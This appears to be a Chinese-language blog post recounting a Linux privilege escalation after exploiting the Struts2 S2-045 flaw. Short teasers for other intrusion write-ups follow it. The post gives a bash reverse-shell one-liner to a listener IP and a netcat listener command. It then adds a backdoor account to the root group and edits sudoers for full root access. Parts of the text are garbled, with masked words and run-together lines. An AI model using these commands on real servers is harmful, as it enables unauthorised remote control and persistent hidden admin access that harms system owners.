前言、
提權這麼久了 還是頭一次提下linux的伺服器。。。
由於之前一直鑽研的win伺服器 要不是前些日子爆出來struts2-045漏洞
估計還沒時間接觸linux提權....
正文、
st2漏洞頁面
可以看到是root許可權的
接著就是想辦法新增乙個root組的使用者
由於新增使用者需要兩次重複輸入密碼(不像win伺服器直接net user)
所以nc**乙個shell到外網伺服器上
nc -vv -l -p 2333在st2工具裡輸入
bash -i >& /dev/tcp/10.0.0.1/2333 0>&110.0.0.1是你的外網ip 2333是你監聽的埠
然後執行** 成功**上來後
新增使用者、
用adduser命令新增乙個普通使用者,命令如下:新增使用者到root組、方法一:修改 /etc/sudoers 檔案,找到下面一行,把前面的注釋(#)去掉#adduser sf197 //新增乙個名為sf197的使用者
#passwd sf197 //修改密碼
changing password for user sf197.
new unix password: //在這裡輸入新密碼
retype new unix password: //再次輸入新密碼
passwd: all authentication tokens updated successfully.//建立成功。
## allows people in group wheel to run all commands
%wheel all=(all) all
然後修改使用者,使其屬於root組(wheel),命令如下:
#usermod -g root sf197
修改完畢,現在可以用sf197帳號登入,然後用命令 su - ,即可獲得root許可權進行操作。
方法二:修改 /etc/sudoers 檔案,找到下面一行,在root下面新增一行,如下所示:
## allow root to run any commands anywhere
root all=(all) all
sf197 all=(all) all
修改完畢,現在可以用sf197帳號登入,然後用命令 su - ,即可獲得root許可權進行操作。
成功新增完畢
用ssh協議連線伺服器 執行id返回root組!
記一次艱難的提權
記一次艱難的提權 資料報經過路由器就被拋棄了.初步判斷是路由器設定了acl表。掃瞄了一下目標伺服器,只開了80埠,伺服器作業系統是windows 2003.埠復用在2003上不管用。看來只有把iis停了再把45678埠轉到80埠上了。在c windows 目錄中寫了個1.bat 內容是copy c ...
記一次繞過寶塔提權
目標站點 72.243,首頁如下圖所示 簡單資訊收集得到以下資訊 thinkphp框架搭建的 可以利用遠端執行或者找找注入,本人習慣先從後台入手,url隨手加個admin得到後台 這裡沒有驗證碼復用,我們手動爆破下賬號密碼,這裡運氣不錯,管理賬號弱口令,直接進入後台 有了後台,getshell就相對...
一次 vulnhub靶機提權
kali linux vmware 橋接模式,複製網絡卡狀態 windows 物理機 檢視原始碼,得到 訪問 rambo.html kali 直接使用 掃出乙個目錄 johnnyrambo 這邊因為靶機是公用的,然後被人rm rf 了,所以我自己重新搭建了乙個 ip 位址改成 192.168.232...